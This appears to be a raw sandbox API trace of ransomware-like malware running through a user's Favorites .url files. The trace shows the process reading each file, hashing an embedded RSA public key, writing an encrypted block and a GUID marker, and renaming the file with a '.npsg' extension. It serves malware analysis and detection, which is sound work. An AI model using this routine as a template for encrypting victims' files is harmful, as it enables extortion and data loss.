[0237.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.897] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409680 [0237.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400788 [0237.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34096c8 [0237.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007a0 [0237.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007d0 [0237.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400830 [0237.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007e8 [0237.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.898] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.898] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.898] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.899] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.899] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.899] CloseHandle (hObject=0x644) returned 1 [0237.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0237.903] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.npsg")) returned 1 [0237.905] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0237.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70e008 [0237.905] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0237.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.906] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.906] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.909] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.909] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.912] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.912] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.913] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.913] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.913] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.913] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.913] GetLastError () returned 0x0 [0237.913] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.913] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.913] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.913] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.914] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.914] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007e8 | out: hHeap=0x620000) returned 1 [0237.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400800 | out: hHeap=0x620000) returned 1 [0237.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400848 | out: hHeap=0x620000) returned 1 [0237.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400848 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400800 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34007e8 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0237.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400800 | out: hHeap=0x620000) returned 1 [0237.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007e8 | out: hHeap=0x620000) returned 1 [0237.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400848 | out: hHeap=0x620000) returned 1 [0237.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.915] GetCurrentThreadId () returned 0x5b4 [0237.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82dc8 [0237.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0237.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.915] GetCurrentThreadId () returned 0x5b4 [0237.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0237.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0237.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400848 [0237.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.917] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.917] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.917] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.917] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.917] CloseHandle (hObject=0x644) returned 1 [0237.918] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.npsg")) returned 1 [0237.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.920] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70e008 | out: hHeap=0x620000) returned 1 [0237.921] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0237.921] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0237.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.923] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.923] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.926] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.926] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.927] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.927] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.929] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.929] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.929] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.929] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.929] GetLastError () returned 0x0 [0237.929] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.929] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.929] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.929] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.929] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.929] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409710 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007b8 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409758 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007d0 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400800 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400860 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400818 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.930] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400800 | out: hHeap=0x620000) returned 1 [0237.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400818 | out: hHeap=0x620000) returned 1 [0237.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400860 | out: hHeap=0x620000) returned 1 [0237.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400860 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400818 [0237.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400800 [0237.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0237.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.931] 